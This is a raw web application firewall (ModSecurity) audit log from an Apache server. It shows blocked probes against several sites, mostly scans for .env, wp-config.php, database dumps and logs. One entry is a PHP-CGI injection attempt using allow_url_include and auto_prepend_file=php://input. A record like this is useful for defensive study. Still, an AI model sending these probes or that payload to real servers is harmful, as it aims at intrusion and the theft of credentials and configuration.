Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfb65528-Z-- --58d0c92a-A-- [29/Apr/2025:03:50:08 +0700] aA_qAAW3ctMdWeqW3LOhaAAAAEk 103.236.140.4 48084 103.236.140.4 8181 --58d0c92a-B-- GET /app/etc/local.xml HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --58d0c92a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d0c92a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873408968388 730 (- - -) Stopwatch2: 1745873408968388 730; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d0c92a-Z-- --7fba204e-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhawAAAE0 103.236.140.4 48092 103.236.140.4 8181 --7fba204e-B-- GET /var/log/system.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7fba204e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fba204e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873409365573 1833 (- - -) Stopwatch2: 1745873409365573 1833; combined=690, p1=346, p2=318, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fba204e-Z-- --c44f4972-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbAAAAE4 103.236.140.4 48094 103.236.140.4 8181 --c44f4972-B-- GET /var/log/exception.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c44f4972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c44f4972-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873409573784 2492 (- - -) Stopwatch2: 1745873409573784 2492; combined=855, p1=419, p2=411, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c44f4972-Z-- --34d12c7d-A-- [29/Apr/2025:03:50:09 +0700] aA_qAQW3ctMdWeqW3LOhbQAAAE8 103.236.140.4 48096 103.236.140.4 8181 --34d12c7d-B-- GET /.wp-config.php.swp HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --34d12c7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34d12c7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873409799344 611 (- - -) Stopwatch2: 1745873409799344 611; combined=236, p1=210, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34d12c7d-Z-- --dda77c4d-A-- [29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcAAAAFM 103.236.140.4 48104 103.236.140.4 8181 --dda77c4d-B-- GET /wp-content/debug.log HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dda77c4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dda77c4d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873410194725 1931 (- - -) Stopwatch2: 1745873410194725 1931; combined=708, p1=350, p2=330, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dda77c4d-Z-- --659f8f30-A-- [29/Apr/2025:03:50:10 +0700] aA_qAgW3ctMdWeqW3LOhcgAAAFc 103.236.140.4 48108 103.236.140.4 8181 --659f8f30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --659f8f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --659f8f30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||manage.bataranetwork.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873410625291 2826 (- - -) Stopwatch2: 1745873410625291 2826; combined=1255, p1=415, p2=813, p3=0, p4=0, p5=27, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --659f8f30-Z-- --fd1b7a5c-A-- [29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhgwAAAFY 103.236.140.4 48158 103.236.140.4 8181 --fd1b7a5c-B-- GET /backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fd1b7a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd1b7a5c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873416358903 1873 (- - -) Stopwatch2: 1745873416358903 1873; combined=713, p1=364, p2=315, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd1b7a5c-Z-- --9ce2ba27-A-- [29/Apr/2025:03:50:16 +0700] aA_qCAW3ctMdWeqW3LOhhQAAAFc 103.236.140.4 48164 103.236.140.4 8181 --9ce2ba27-B-- GET /db_backup.sql HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 154.83.103.204 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 154.83.103.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9ce2ba27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ce2ba27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745873416576750 1227 (- - -) Stopwatch2: 1745873416576750 1227; combined=430, p1=220, p2=194, p3=0, p4=0, p5=16, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ce2ba27-Z-- --cb59ad5e-A-- [29/Apr/2025:03:52:14 +0700] aA_qfsDCAfZpkPvVAPOdQAAAAIo 103.236.140.4 48620 103.236.140.4 8181 --cb59ad5e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cb59ad5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb59ad5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873534788341 814 (- - -) Stopwatch2: 1745873534788341 814; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb59ad5e-Z-- --ce2f163e-A-- [29/Apr/2025:03:53:53 +0700] aA_q4amWspnM_fF1r_5npwAAAAw 103.236.140.4 49002 103.236.140.4 8181 --ce2f163e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.210.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.210.125 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ce2f163e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce2f163e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745873633789189 880 (- - -) Stopwatch2: 1745873633789189 880; combined=372, p1=337, p2=0, p3=0, p4=0, p5=35, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce2f163e-Z-- --faff0b72-A-- [29/Apr/2025:04:07:43 +0700] aA_uH8DCAfZpkPvVAPOeQQAAAIk 103.236.140.4 52294 103.236.140.4 8181 --faff0b72-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.47.25 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.47.25 Accept-Encoding: gzip X-Varnish: 136680971 --faff0b72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --faff0b72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745874463292042 789 (- - -) Stopwatch2: 1745874463292042 789; combined=348, p1=313, p2=0, p3=0, p4=0, p5=35, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faff0b72-Z-- --dd304e22-A-- [29/Apr/2025:04:38:02 +0700] aA_1OlaiXvaz3oCHN0ie6wAAAMI 103.236.140.4 59952 103.236.140.4 8181 --dd304e22-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --dd304e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd304e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745876282939047 840 (- - -) Stopwatch2: 1745876282939047 840; combined=363, p1=318, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd304e22-Z-- --1c72f071-A-- [29/Apr/2025:04:46:37 +0700] aA_3PQW3ctMdWeqW3LOlMgAAAE8 103.236.140.4 33722 103.236.140.4 8181 --1c72f071-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62 Accept-Charset: utf-8 --1c72f071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c72f071-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745876797316914 843 (- - -) Stopwatch2: 1745876797316914 843; combined=388, p1=353, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c72f071-Z-- --e2439502-A-- [29/Apr/2025:06:16:40 +0700] aBAMWMDCAfZpkPvVAPOmKgAAAIU 103.236.140.4 54468 103.236.140.4 8181 --e2439502-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.233.88.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.233.88.144 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e2439502-C-- --e2439502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2439502-E-- --e2439502-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745882200755402 4937 (- - -) Stopwatch2: 1745882200755402 4937; combined=3134, p1=521, p2=2580, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2439502-Z-- --eb1ac07e-A-- [29/Apr/2025:08:00:13 +0700] aBAknQW3ctMdWeqW3LOwRAAAAEg 103.236.140.4 50254 103.236.140.4 8181 --eb1ac07e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.255.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.255.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --eb1ac07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1ac07e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745888413533076 874 (- - -) Stopwatch2: 1745888413533076 874; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1ac07e-Z-- --68e57301-A-- [29/Apr/2025:08:20:23 +0700] aBApV8DCAfZpkPvVAPOuGgAAAJg 103.236.140.4 54978 103.236.140.4 8181 --68e57301-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.216.113.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.216.113.180 X-Forwarded-Proto: http Connection: close Accept: */* --68e57301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e57301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745889623391585 916 (- - -) Stopwatch2: 1745889623391585 916; combined=392, p1=340, p2=0, p3=0, p4=0, p5=52, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e57301-Z-- --ebecc81e-A-- [29/Apr/2025:08:56:16 +0700] aBAxwMDCAfZpkPvVAPOwDAAAAII 103.236.140.4 35132 103.236.140.4 8181 --ebecc81e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.210.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.210.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ebecc81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebecc81e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745891776631093 763 (- - -) Stopwatch2: 1745891776631093 763; combined=332, p1=300, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebecc81e-Z-- --2756641b-A-- [29/Apr/2025:09:14:17 +0700] aBA1-cDCAfZpkPvVAPOxIAAAAJc 103.236.140.4 39374 103.236.140.4 8181 --2756641b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 Accept-Charset: utf-8 --2756641b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2756641b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745892857714024 797 (- - -) Stopwatch2: 1745892857714024 797; combined=377, p1=340, p2=0, p3=0, p4=0, p5=36, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2756641b-Z-- --a6b78169-A-- [29/Apr/2025:09:40:03 +0700] aBA8A1aiXvaz3oCHN0iuAAAAAMM 103.236.140.4 45628 103.236.140.4 8181 --a6b78169-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --a6b78169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6b78169-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file 